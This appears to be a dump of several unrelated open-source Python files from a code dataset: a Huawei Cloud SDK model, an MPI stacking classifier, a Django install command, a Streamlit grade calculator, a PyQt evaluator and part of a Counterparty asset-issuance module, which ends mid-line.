@phone_number.setter\n def phone_number(self, phone_number):\n \"\"\"Sets the phone_number of this JoinRequestSchema.\n\n the phone_number of user\n\n :param phone_number: The phone_number of this JoinRequestSchema.\n :type phone_number: str\n \"\"\"\n self._phone_number = phone_number\n\n @property\n def invitation_code(self):\n \"\"\"Gets the invitation_code of this JoinRequestSchema.\n\n the invitation_code\n\n :return: The invitation_code of this JoinRequestSchema.\n :rtype: str\n \"\"\"\n return self._invitation_code\n\n @invitation_code.setter\n def invitation_code(self, invitation_code):\n \"\"\"Sets the invitation_code of this JoinRequestSchema.\n\n the invitation_code\n\n :param invitation_code: The invitation_code of this 
JoinRequestSchema.\n :type invitation_code: str\n \"\"\"\n self._invitation_code = invitation_code\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n if attr in self.sensitive_list:\n result[attr] = \"****\"\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n import simplejson as json\n if six.PY2:\n import sys\n reload(sys)\n sys.setdefaultencoding(\"utf-8\")\n return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)\n\n def __repr__(self):\n \"\"\"For `print`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, JoinRequestSchema):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","repo_name":"huaweicloud/huaweicloud-sdk-python-v3","sub_path":"huaweicloud-sdk-cloudide/huaweicloudsdkcloudide/v2/model/join_request_schema.py","file_name":"join_request_schema.py","file_ext":"py","file_size_in_byte":7091,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"20"} +{"seq_id":"43497876049","text":"import argparse\nimport sys\nimport time\nimport timeit\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sn\nfrom mpi4py import MPI\nfrom sklearn import datasets, metrics, svm\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model.ridge import RidgeClassifier\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import KFold, train_test_split\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\n\nimport dataset_loader as loader\nimport StackingClassifier as st\n\n\ndef bcast_data(data):\n print(\n f'[INFO] Bcasting data from the root process ({rank})') if rank == 0 else None\n bcast_start_time = MPI.Wtime()\n data = comm.bcast(data, root=0)\n bcast_finish_time = MPI.Wtime()\n\n bcast_time = bcast_finish_time - bcast_start_time\n print(f'[TIME] Master process ({rank}) finished Bcasting data with time {bcast_time}') if rank == 0 else print(\n f'[TIME] Process {rank} finished receive bcasted data with time {bcast_time}')\n return data\n\n\ndef classify(X_train, X_test, y_train, y_test):\n # classification\n algorithm = None\n classification_time_start = MPI.Wtime()\n if rank == 0:\n algorithm = 'ridge'\n clf0 = RidgeClassifier()\n st.fit(clf0, X_train, y_train)\n classification_output = st.predict(clf0, X_test)\n pass\n elif rank == 1:\n algorithm = 'randomForest'\n clf1 = RandomForestClassifier(n_estimators=10)\n st.fit(clf1, X_train, y_train)\n classification_output = st.predict(clf1, X_test)\n pass\n elif rank == 2:\n algorithm = 'lda'\n clf2 = LinearDiscriminantAnalysis()\n st.fit(clf2, X_train, y_train)\n classification_output = st.predict(clf2, X_test)\n pass\n elif rank == 3:\n algorithm = 
'GaussianNaiveBayes'\n clf3 = GaussianNB()\n st.fit(clf3, X_train, y_train)\n classification_output = st.predict(clf3, X_test)\n pass\n\n classification_time_end = MPI.Wtime()\n classification_time = classification_time_end - classification_time_start\n print(\n f'[TIME] Process {rank} finished classification by {algorithm} algorithm with time: {classification_time}')\n return classification_output\n\n\ndef train_test(X, y):\n if rank == 0:\n X_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.3, shuffle=False)\n\n data = (X_train, X_test, y_train, y_test)\n else:\n data = None\n program_start_time = MPI.Wtime()\n\n X_train, X_test, y_train, y_test = bcast_data(data)\n\n classification_output = classify(X_train, X_test, y_train, y_test)\n outputs_from_classifications = comm.gather(classification_output)\n # stacking\n if rank == 0:\n voted_data = st.vote(outputs_from_classifications)\n acc = accuracy_score(voted_data, y_test)\n print(f'[ACCURANCY] Final accurancy for test-train is {acc}')\n\n\ndef cross_validation(X, y):\n if rank == 0:\n kf = KFold(n_splits=10, shuffle=True)\n kfold_array = []\n for train_index, test_index in kf.split(X):\n X_train, X_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n kfold_array.append((X_train, X_test, y_train, y_test))\n data = (kfold_array)\n else:\n data = None\n\n data = bcast_data(data)\n accuracies = list()\n count = 0\n for tuple_with_data in data:\n count += 1\n print(\n f\"[INFO] Running cross_validation with {count} chunk of data by {rank} process\")\n X_train, X_test, y_train, y_test = tuple_with_data\n classification_output = classify(X_train, X_test, y_train, y_test)\n outputs_from_classifications = comm.gather(classification_output)\n # stacking\n if rank == 0:\n voted_data = st.vote(outputs_from_classifications)\n acc = accuracy_score(voted_data, y_test)\n\n accuracies.append(acc)\n comm.barrier()\n\n if rank == 0:\n acc_final = np.mean(accuracies)\n print(f'[ACCURANCY] Final accurancy with CV chunks is {acc_final}')\n\n\n# initialize MPI environment\ncomm = MPI.COMM_WORLD\nsize = comm.Get_size()\nrank = comm.Get_rank()\n\nif rank == 0:\n print(f\"[INFO] Program runned in {size} processes\")\n\nprint(f\"[INFO] Hello from process number {rank}\")\n\nif sys.argv[1] == 'MNIST':\n X, y = loader.load_mnist_data()\nelif sys.argv[1] == 'CIFAR-10':\n X, y = loader.load_cifar10_data()\nelif sys.argv[1] == 'CIFAR-100':\n X, y = loader.load_cifar100_data()\nelif sys.argv[1] == 'letter-recognition':\n X, y = loader.load_letter_data()\n\nprogram_start_time = MPI.Wtime()\n\nif sys.argv[2] == 'CV':\n classification_output = cross_validation(X, y)\nelif sys.argv[2] == 'test-train':\n classification_output = train_test(X, y)\n\nprogram_end_time = MPI.Wtime()\nprogram_time = program_end_time - program_start_time\n\nif rank == 0:\n print(f'[INFO] Stacking classifier finish work with time: {program_time}')\n# MPI environment finalization\nMPI.Finalize()\n","repo_name":"codevibess/parallel-stacking-classifier","sub_path":"parallel_flow.py","file_name":"parallel_flow.py","file_ext":"py","file_size_in_byte":5148,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"7402320867","text":"import os\n\nfrom django.conf import settings\nfrom django.core.management import call_command\nfrom rest_framework_api_key.models import APIKey\n\nfrom fedow_core.models import Configuration, Wallet, Asset, Federation, wallet_creator\nfrom 
django.core.management.base import BaseCommand, CommandError\n\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.asymmetric import padding\nfrom cryptography.exceptions import InvalidSignature\nimport logging\n\nfrom fedow_core.utils import rsa_generator\n\nlogger = logging.getLogger(__name__)\n\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n # Positional arguments\n parser.add_argument(\n \"--test\",\n action=\"store_true\",\n help=\"Add test data\",\n )\n\n def handle(self, *args, **options):\n\n try:\n config = Configuration.get_solo()\n self.stdout.write(self.style.ERROR(f'Configuration and master wallet already exists : {config.name}'),\n ending='\\n')\n except Exception as e:\n primary_wallet = wallet_creator(name=\"Primary Wallet\")\n\n instance_name = os.environ.get('DOMAIN', 'fedow.tibillet.localhost')\n config = Configuration(\n name=instance_name,\n domain=instance_name,\n primary_wallet=primary_wallet,\n )\n\n config.save()\n\n call_command(\"assets\",\n '--create',\n '--name', 'Primary Asset',\n '--currency_code', 'FED',\n '--wallet_origin', f'{primary_wallet.uuid}',\n '--category', 'FED')\n\n if Asset.objects.all().count() > 1:\n raise CommandError(\"There is more than one asset, it's not an install nor an empty database.\")\n\n fed_asset = Asset.objects.first()\n if fed_asset.wallet_origin != config.primary_wallet:\n raise CommandError(\"Fedow origin is not primary wallet\")\n\n price_stripe_id_refill_fed = os.environ.get('PRICE_STRIPE_ID_FED')\n if not price_stripe_id_refill_fed:\n price_stripe_id_refill_fed = fed_asset.get_id_price_stripe(force=True)\n fed_asset.id_price_stripe = price_stripe_id_refill_fed\n fed_asset.save()\n\n primary_federation = Federation.objects.create(name=\"Fedow\")\n\n self.stdout.write(\n self.style.SUCCESS(f'Configuration, primary asset, wallet and token created : {instance_name}'),\n ending='\\n')\n","repo_name":"TiBillet/Fedow","sub_path":"fedow_core/management/commands/install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"11418786681","text":"from typing import List\n\n\nclass Solution:\n def groupStrings(self, strings: List[str]) -> List[List[str]]:\n table = {}\n for s in strings:\n offset = ord(s[0]) - ord(\"a\")\n key = \"\".join(chr((ord(c) - ord(\"a\") - offset) % 26 + ord(\"a\")) for c in s)\n table.setdefault(key, []).append(s)\n return [v for v in table.values()]\n","repo_name":"faterazer/LeetCode","sub_path":"0249. 
Group Shifted Strings/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"20"} +{"seq_id":"3325329962","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#########################################################################################################################################\n#\n# VideoModel Trainer builder By Bertrand NOUVEL\n# 2009 CNRS Postdoctorate JFLI\n#\n# (c) All rights reserved\n# ###############################################\n#\n#########################################################################################################################################\n# Import required objects\n#########################################################################################################################################\n\nimport sys\nfrom pycvf.lib.info.graph import *\nfrom pycvf.core.generic_application import *\nfrom pycvf.lib.ui.qt import qapp\nfrom pycvf.lib.ui import qtdbevaluator\n\n\nclass DbEvaluator(DatabaseUsingApplication):\n class ProgramMetadata(object):\n name=\"Database Show Application\"\n version=\"1.0\"\n author=\"Bertrand Nouvel bertrand.nouvel@gmail.com\"\n copyright=\" COPYRIGHT Bertrand Nouvel - JFLI - CNRS 2009\"\n license=\"GPLv3\"\n\n session=CmdLineString(\"s\",\"session\",\"sessionname\",\"name of the session\",\"std\")\n annfilename=CmdLineString(None,\"weightfile\",\"path\",\"file should be use to store evaluation result\",os.environ[\"HOME\"]+\"/\"+\"weights/$database-$session.pcl\")\n\n @classmethod\n def process(cls,nrels=1,*args,**kwargs): \n annfile=cls.annfilename.value\n annfile=annfile.replace(\"$database\",cls.database.value)\n annfile=annfile.replace(\"$session\",cls.session.value)\n qapp.processEvents()\n try:\n vdbval=pickle.load(file(annfile,\"rb\"))\n except:\n vdbval=None\n d=qtdbevaluator.QtDBEvaluatorDialog(cls.vdb,cls.vdbval)\n qapp.processEvents()\n if d.exec_():\n pickle.dump(d.pwl.vdbval,file(annfile,\"wb\"),protocol=2)\n \n\nif __name__==\"__main__\":\n DbEvaluator.run(sys.argv[1])","repo_name":"bnouvel-wio/pycvf","sub_path":"pycvf/trunk/pycvf/apps/dbevaluator.py","file_name":"dbevaluator.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"7123862827","text":"from copy import deepcopy\n\nimport pandas as pd\nimport plotly.express as px\nimport streamlit as st\n\nusecols = [\"科目大区分\", \"科目中区分\", \"科目\", \"単位数\", \"修得年度\", \"修得学期\", \"評価\", \"評語\", \"合否\"]\n\nst.write(\"[GitHub](https://github.com/youthesame/calc_academic_record.git)\")\nuploaded_file = st.file_uploader(\n \"学務情報システムからダウンロードした 「kakuteiSeisekiCsv.csv」 を選択してください\", type=\"csv\"\n)\nst.write(\"動作しない場合は [こちら](https://forms.gle/SBvfQuE7kAiLGMULA)\")\n\nif uploaded_file is not None:\n try:\n _df = pd.read_csv(uploaded_file, header=3, usecols=usecols, encoding=\"cp932\")\n except ValueError:\n st.error(\"**アップロードされたファイルは処理できません。**もう一度、学務情報システムから成績をダウンロードしてください。\")\n str_replace = {\"S\": 4, \"A\": 3, \"B\": 2, \"C\": 1, \"F\": 0, \"否\": 0, \"合\": 1}\n df = _df.replace(str_replace)\n df[\"点数\"] = df[\"単位数\"] * df[\"評語\"] * df[\"合否\"]\n\n gps = df[\"点数\"].sum()\n gpa = gps / df[\"単位数\"].sum()\n\n # 年度別ヒストグラムの作成\n df[\"修得年度\"] = df[\"修得年度\"].astype(str)\n fig = px.histogram(\n df,\n x=\"修得年度\",\n y=\"点数\",\n color=\"修得学期\",\n labels={\"修得学期\": \"学期\", \"修得年度\": \"年度\", \"点数\": \"grade point\"},\n )\n 
fig.update_xaxes(title=\"年度\")\n fig.update_yaxes(title=\"GPS\")\n\n # GPS・GPAの詳細\n df[\"修得年度\"] = df[\"修得年度\"].astype(int)\n year_list0 = df[\"修得年度\"].unique().tolist()\n ylen = len(year_list0)\n year_list = deepcopy(year_list0)\n year_list.extend(year_list0)\n year_list.sort()\n semester_list0 = [\"前期\", \"後期\"]\n semester_list = []\n for _ in range(ylen):\n semester_list.extend(semester_list0)\n\n data = pd.DataFrame()\n count = 0\n for year in year_list0:\n for semester in semester_list0:\n tmp_df = df[(df[\"修得年度\"] == year) & (df[\"修得学期\"] == semester)]\n tmp_gps = tmp_df[\"点数\"].sum()\n data.at[f\"{count}\", \"GPS\"] = tmp_gps\n data.at[f\"{count}\", \"GPA\"] = tmp_gps / tmp_df[\"単位数\"].sum()\n count += 1\n\n ndata = data.values\n record_df = pd.DataFrame(\n data=ndata, index=([year_list, semester_list]), columns=data.columns\n )\n record_df[\"GPS\"] = record_df[\"GPS\"].astype(int)\n record_df.loc[\"Total\", :] = [gps, gpa]\n\n eval_series = _df[\"評語\"].value_counts()\n eval_series.name = \"取得数\"\n\n subject_series = pd.Series(dtype=\"int64\")\n sbject_list = df[\"科目中区分\"].unique().tolist()\n for subject in sbject_list:\n a = df[(df[\"科目中区分\"] == subject) & (df[\"合否\"] == 1)]\n subject_series[subject] = a[\"単位数\"].sum()\n subject_series[\"Total\"] = subject_series.sum()\n subject_series.name = \"取得単位数\"\n\n # streamlitで表示\n st.header(\"成績表\")\n st.table(record_df)\n st.header(\"成績推移\")\n st.plotly_chart(fig, use_container_width=True)\n st.header(\"評価数\")\n st.table(eval_series)\n st.header(\"科目別単位数\")\n st.table(subject_series)\n st.header(\"詳細\")\n st.dataframe(_df)\n","repo_name":"youthesame/calc_academic_record","sub_path":"calc_academic_record.py","file_name":"calc_academic_record.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"17070595122","text":"from train import run_train\r\nfrom predict import predict\r\n\r\n\r\ndef run_training():\r\n run_train()\r\n\r\n\r\ndef run_predict():\r\n predict(6)\r\n\r\n# Option 1: Run the training, 2: Run the prediction\r\n\r\n\r\nif __name__ == \"__main__\":\r\n option = input(\"Enter 1 to train the model or 2 to predict: \")\r\n if option == \"1\":\r\n run_training()\r\n elif option == \"2\":\r\n run_predict()\r\n else:\r\n print(\"Invalid option\")\r\n","repo_name":"HJacksons/NN-MNIST","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"34127685978","text":"#! /usr/bin/python3\n\n\"\"\"\nAllow simultaneous lock and transfer.\n\"\"\"\n\nimport struct\nimport decimal\nimport json\nimport logging\nlogger = logging.getLogger(__name__)\nD = decimal.Decimal\n\nfrom counterpartylib.lib import (config, util, exceptions, util, message_type)\n\nFORMAT_1 = '>QQ?'\nLENGTH_1 = 8 + 8 + 1\nFORMAT_2 = '>QQ??If'\nLENGTH_2 = 8 + 8 + 1 + 1 + 4 + 4\nSUBASSET_FORMAT = '>QQ?B'\nSUBASSET_FORMAT_LENGTH = 8 + 8 + 1 + 1\nID = 20\nSUBASSET_ID = 21\n# NOTE: Pascal strings are used for storing descriptions for backwards‐compatibility.\n\n#Lock Reset issuances. 
Default composed message\nLR_ISSUANCE_ID = 22\nLR_SUBASSET_ID = 23\n\nDESCRIPTION_MARK_BYTE = b'\\xc0'\nDESCRIPTION_NULL_ACTION = \"NULL\"\n\ndef initialise(db):\n cursor = db.cursor()\n cursor.execute('''CREATE TABLE IF NOT EXISTS issuances(\n tx_index INTEGER PRIMARY KEY,\n tx_hash TEXT UNIQUE,\n block_index INTEGER,\n asset TEXT,\n quantity INTEGER,\n divisible BOOL,\n source TEXT,\n issuer TEXT,\n transfer BOOL,\n callable BOOL,\n call_date INTEGER,\n call_price REAL,\n description TEXT,\n fee_paid INTEGER,\n locked BOOL,\n status TEXT,\n asset_longname TEXT,\n reset BOOL,\n FOREIGN KEY (tx_index, tx_hash, block_index) REFERENCES transactions(tx_index, tx_hash, block_index))\n ''')\n\n # Add asset_longname for sub-assets\n # SQLite can’t do `ALTER TABLE IF COLUMN NOT EXISTS`.\n columns = [column['name'] for column in cursor.execute('''PRAGMA table_info(issuances)''')]\n if 'asset_longname' not in columns:\n cursor.execute('''ALTER TABLE issuances ADD COLUMN asset_longname TEXT''')\n if 'reset' not in columns:\n cursor.execute('''ALTER TABLE issuances ADD COLUMN reset BOOL''')\n\n # If sweep_hotfix activated, Create issuances copy, copy old data, drop old table, rename new table, recreate indexes\n # SQLite can’t do `ALTER TABLE IF COLUMN NOT EXISTS` nor can drop UNIQUE constraints\n if 'msg_index' not in columns:\n cursor.execute('''CREATE TABLE IF NOT EXISTS new_issuances(\n tx_index INTEGER,\n tx_hash TEXT,\n msg_index INTEGER DEFAULT 0,\n block_index INTEGER,\n asset TEXT,\n quantity INTEGER,\n divisible BOOL,\n source TEXT,\n issuer TEXT,\n transfer BOOL,\n callable BOOL,\n call_date INTEGER,\n call_price REAL,\n description TEXT,\n fee_paid INTEGER,\n locked BOOL,\n status TEXT,\n asset_longname TEXT,\n reset BOOL,\n PRIMARY KEY (tx_index, msg_index),\n FOREIGN KEY (tx_index, tx_hash, block_index) REFERENCES transactions(tx_index, tx_hash, block_index),\n UNIQUE (tx_hash, msg_index))\n ''')\n cursor.execute('''INSERT INTO new_issuances(tx_index, tx_hash, msg_index,\n block_index, asset, quantity, divisible, source, issuer, transfer, callable,\n call_date, call_price, description, fee_paid, locked, status, asset_longname, reset)\n SELECT tx_index, tx_hash, 0, block_index, asset, quantity, divisible, source,\n issuer, transfer, callable, call_date, call_price, description, fee_paid,\n locked, status, asset_longname, reset FROM issuances''', {})\n cursor.execute('DROP TABLE issuances')\n cursor.execute('ALTER TABLE new_issuances RENAME TO issuances')\n\n cursor.execute('''CREATE INDEX IF NOT EXISTS\n block_index_idx ON issuances (block_index)\n ''')\n cursor.execute('''CREATE INDEX IF NOT EXISTS\n valid_asset_idx ON issuances (asset, status)\n ''')\n cursor.execute('''CREATE INDEX IF NOT EXISTS\n status_idx ON issuances (status)\n ''')\n cursor.execute('''CREATE INDEX IF NOT EXISTS\n source_idx ON issuances (source)\n ''')\n\n cursor.execute('''CREATE INDEX IF NOT EXISTS\n asset_longname_idx ON issuances (asset_longname)\n ''')\n\ndef validate (db, source, destination, asset, quantity, divisible, lock, reset, callable_, call_date, call_price, description, subasset_parent, subasset_longname, block_index):\n problems = []\n fee = 0\n\n if asset in (config.BTC, config.XCP):\n problems.append('cannot issue {} or {}'.format(config.BTC, config.XCP))\n\n if call_date is None: call_date = 0\n if call_price is None: call_price = 0.0\n if description is None: description = \"\"\n if divisible is None: divisible = True\n if lock is None: lock = False\n if reset is None: reset = False\n\n if 
isinstance(call_price, int): call_price = float(call_price)\n #^ helps especially with calls from JS‐based clients, where parseFloat(15) returns 15 (not 15.0), which json takes as an int\n\n if not isinstance(quantity, int):\n problems.append('quantity must be in satoshis')\n return call_date, call_price, problems, fee, description, divisible, None, None\n if call_date and not isinstance(call_date, int):\n problems.append('call_date must be epoch integer')\n return call_date, call_price, problems, fee, description, divisible, None, None\n if call_price and not isinstance(call_price, float):\n problems.append('call_price must be a float')\n return call_date, call_price, problems, fee, description, divisible, None, None\n\n if quantity < 0: problems.append('negative quantity')\n if call_price < 0: problems.append('negative call price')\n if call_date < 0: problems.append('negative call date')\n\n # Callable, or not.\n if not callable_:\n if block_index >= 312500 or config.TESTNET or config.REGTEST: # Protocol change.\n call_date = 0\n call_price = 0.0\n elif block_index >= 310000: # Protocol change.\n if call_date:\n problems.append('call date for non‐callable asset')\n if call_price:\n problems.append('call price for non‐callable asset')\n\n # Valid re-issuance?\n cursor = db.cursor()\n cursor.execute('''SELECT * FROM issuances \\\n WHERE (status = ? AND asset = ?)\n ORDER BY tx_index ASC''', ('valid', asset))\n issuances = cursor.fetchall()\n cursor.close()\n reissued_asset_longname = None\n if issuances:\n reissuance = True\n last_issuance = issuances[-1]\n reissued_asset_longname = last_issuance['asset_longname']\n issuance_locked = False\n if util.enabled('issuance_lock_fix'):\n for issuance in issuances:\n if issuance['locked']:\n issuance_locked = True\n break\n elif last_issuance['locked']:\n # before the issuance_lock_fix, only the last issuance was checked\n issuance_locked = True\n\n if last_issuance['issuer'] != source:\n problems.append('issued by another address')\n if (bool(last_issuance['divisible']) != bool(divisible)) and ((not util.enabled(\"cip03\", block_index)) or (not reset)):\n problems.append('cannot change divisibility')\n if (not util.enabled(\"issuance_callability_parameters_removal\", block_index)) and bool(last_issuance['callable']) != bool(callable_):\n problems.append('cannot change callability')\n if last_issuance['call_date'] > call_date and (call_date != 0 or (block_index < 312500 and (not config.TESTNET or not config.REGTEST))):\n problems.append('cannot advance call date')\n if last_issuance['call_price'] > call_price:\n problems.append('cannot reduce call price')\n if issuance_locked and quantity:\n problems.append('locked asset and non‐zero quantity')\n if issuance_locked and reset:\n problems.append('cannot reset a locked asset')\n else:\n reissuance = False\n if description.lower() == 'lock':\n problems.append('cannot lock a non‐existent asset')\n #if destination:\n # problems.append('cannot transfer a non‐existent asset')\n if reset:\n problems.append('cannot reset a non existent asset')\n\n # validate parent ownership for subasset\n if subasset_longname is not None and not reissuance:\n cursor = db.cursor()\n cursor.execute('''SELECT * FROM issuances \\\n WHERE (status = ? 
AND asset = ?)\n ORDER BY tx_index ASC''', ('valid', subasset_parent))\n parent_issuances = cursor.fetchall()\n cursor.close()\n if parent_issuances:\n last_parent_issuance = parent_issuances[-1]\n if last_parent_issuance['issuer'] != source:\n problems.append('parent asset owned by another address')\n else:\n problems.append('parent asset not found')\n\n # validate subasset issuance is not a duplicate\n if subasset_longname is not None and not reissuance:\n cursor = db.cursor()\n cursor.execute('''SELECT * FROM assets \\\n WHERE (asset_longname = ?)''', (subasset_longname,))\n assets = cursor.fetchall()\n if len(assets) > 0:\n problems.append('subasset already exists')\n\n # validate that the actual asset is numeric\n if asset[0] != 'A':\n problems.append('a subasset must be a numeric asset')\n\n\n\n # Check for existence of fee funds.\n if quantity or (block_index >= 315000 or config.TESTNET or config.REGTEST): # Protocol change.\n if not reissuance or (block_index < 310000 and not config.TESTNET and not config.REGTEST): # Pay fee only upon first issuance. (Protocol change.)\n cursor = db.cursor()\n cursor.execute('''SELECT * FROM balances \\\n WHERE (address = ? AND asset = ?)''', (source, config.XCP))\n balances = cursor.fetchall()\n cursor.close()\n if util.enabled('numeric_asset_names'): # Protocol change.\n if subasset_longname is not None and util.enabled('subassets'): # Protocol change.\n # subasset issuance is 0.25\n fee = int(0.25 * config.UNIT)\n elif len(asset) >= 13:\n fee = 0\n else:\n fee = int(0.5 * config.UNIT)\n elif block_index >= 291700 or config.TESTNET or config.REGTEST: # Protocol change.\n fee = int(0.5 * config.UNIT)\n elif block_index >= 286000 or config.TESTNET or config.REGTEST: # Protocol change.\n fee = 5 * config.UNIT\n elif block_index > 281236 or config.TESTNET or config.REGTEST: # Protocol change.\n fee = 5\n if fee and (not balances or balances[0]['quantity'] < fee):\n problems.append('insufficient funds')\n\n if not (block_index >= 317500 or config.TESTNET or config.REGTEST): # Protocol change.\n if len(description) > 42:\n problems.append('description too long')\n\n # For SQLite3\n call_date = min(call_date, config.MAX_INT)\n assert isinstance(quantity, int)\n if reset and util.enabled(\"cip03\", block_index):#reset will overwrite the quantity\n if quantity > config.MAX_INT:\n problems.append('total quantity overflow') \n else:\n total = sum([issuance['quantity'] for issuance in issuances])\n if total + quantity > config.MAX_INT:\n problems.append('total quantity overflow')\n\n if util.enabled(\"cip03\", block_index) and reset and issuances:\n cursor = db.cursor()\n #Checking that all supply are held by the owner of the asset\n cursor.execute('''SELECT * FROM balances \\\n WHERE asset = ? 
AND quantity > 0''', (asset,))\n balances = cursor.fetchall()\n cursor.close()\n \n if (len(balances) == 0):\n if util.asset_supply(db, asset) > 0:\n problems.append('Cannot reset an asset with no holder')\n elif (len(balances) > 1):\n problems.append('Cannot reset an asset with many holders')\n elif (len(balances) == 1):\n if (balances[0]['address'] != last_issuance[\"issuer\"]):\n problems.append('Cannot reset an asset held by a different address than the owner')\n\n #if destination and quantity:\n # problems.append('cannot issue and transfer simultaneously')\n\n # For SQLite3\n if util.enabled('integer_overflow_fix', block_index=block_index) and (fee > config.MAX_INT or quantity > config.MAX_INT):\n problems.append('integer overflow')\n\n return call_date, call_price, problems, fee, description, divisible, lock, reset, reissuance, reissued_asset_longname\n\n\ndef compose (db, source, transfer_destination, asset, quantity, divisible, lock, reset, description):\n\n # Callability is deprecated, so for re‐issuances set relevant parameters\n # to old values; for first issuances, make uncallable.\n cursor = db.cursor()\n cursor.execute('''SELECT * FROM issuances \\\n WHERE (status = ? AND asset = ?)\n ORDER BY tx_index ASC''', ('valid', asset))\n issuances = cursor.fetchall()\n if issuances:\n last_issuance = issuances[-1]\n callable_ = last_issuance['callable']\n call_date = last_issuance['call_date']\n call_price = last_issuance['call_price']\n else:\n callable_ = False\n call_date = 0\n call_price = 0.0\n cursor.close()\n\n # check subasset\n subasset_parent = None\n subasset_longname = None\n if util.enabled('subassets'): # Protocol change.\n subasset_parent, subasset_longname = util.parse_subasset_from_asset_name(asset)\n if subasset_longname is not None:\n # try to find an existing subasset\n sa_cursor = db.cursor()\n sa_cursor.execute('''SELECT * FROM assets \\\n WHERE (asset_longname = ?)''', (subasset_longname,))\n assets = sa_cursor.fetchall()\n sa_cursor.close()\n if len(assets) > 0:\n # this is a reissuance\n asset = assets[0]['asset_name']\n else:\n # this is a new issuance\n # generate a random numeric asset id which will map to this subasset\n asset = util.generate_random_asset()\n\n asset_id = util.generate_asset_id(asset, util.CURRENT_BLOCK_INDEX)\n asset_name = util.generate_asset_name(asset_id, util.CURRENT_BLOCK_INDEX) #This will remove leading zeros in the numeric assets\n \n call_date, call_price, problems, fee, validated_description, divisible, lock, reset, reissuance, reissued_asset_longname = validate(db, source, transfer_destination, asset_name, quantity, divisible, lock, reset, callable_, call_date, call_price, description, subasset_parent, subasset_longname, util.CURRENT_BLOCK_INDEX)\n if problems: raise exceptions.ComposeError(problems)\n\n if subasset_longname is None or reissuance:\n asset_format = util.get_value_by_block_index(\"issuance_asset_serialization_format\")\n asset_format_length = util.get_value_by_block_index(\"issuance_asset_serialization_length\")\n \n # Type 20 standard issuance FORMAT_2 >QQ??If\n # used for standard issuances and all reissuances\n if util.enabled(\"issuance_backwards_compatibility\"):\n data = message_type.pack(LR_ISSUANCE_ID)\n else: \n data = message_type.pack(ID)\n \n if description == None and util.enabled(\"issuance_description_special_null\"):\n #a special message is created to be catched by the parse function\n curr_format = asset_format + '{}s'.format(len(DESCRIPTION_MARK_BYTE)+len(DESCRIPTION_NULL_ACTION))\n 
encoded_description = DESCRIPTION_MARK_BYTE+DESCRIPTION_NULL_ACTION.encode('utf-8')\n else:\n if (len(validated_description) <= 42) and not util.enabled('pascal_string_removed'):\n curr_format = FORMAT_2 + '{}p'.format(len(validated_description) + 1)\n else:\n curr_format = asset_format + '{}s'.format(len(validated_description))\n \n encoded_description = validated_description.encode('utf-8')\n \n \n \n \n if (asset_format_length <= 19):# callbacks parameters were removed\n data += struct.pack(curr_format, asset_id, quantity, 1 if divisible else 0, 1 if lock else 0, 1 if reset else 0, encoded_description)\n elif (asset_format_length <= 26):\n data += struct.pack(curr_format, asset_id, quantity, 1 if divisible else 0, 1 if callable_ else 0,\n call_date or 0, call_price or 0.0, encoded_description)\n elif (asset_format_length <= 27):# param reset was inserted\n data += struct.pack(curr_format, asset_id, quantity, 1 if divisible else 0, 1 if reset else 0, 1 if callable_ else 0,\n call_date or 0, call_price or 0.0, encoded_description)\n elif (asset_format_length <= 28):# param lock was inserted\n data += struct.pack(curr_format, asset_id, quantity, 1 if divisible else 0, 1 if lock else 0, 1 if reset else 0, 1 if callable_ else 0,\n call_date or 0, call_price or 0.0, encoded_description)\n else:\n subasset_format = util.get_value_by_block_index(\"issuance_subasset_serialization_format\",util.CURRENT_BLOCK_INDEX)\n subasset_format_length = util.get_value_by_block_index(\"issuance_subasset_serialization_length\",util.CURRENT_BLOCK_INDEX)\n\n # Type 21 subasset issuance SUBASSET_FORMAT >QQ?B\n # Used only for initial subasset issuance\n # compacts a subasset name to save space\n compacted_subasset_longname = util.compact_subasset_longname(subasset_longname)\n compacted_subasset_length = len(compacted_subasset_longname)\n if util.enabled(\"issuance_backwards_compatibility\"):\n data = 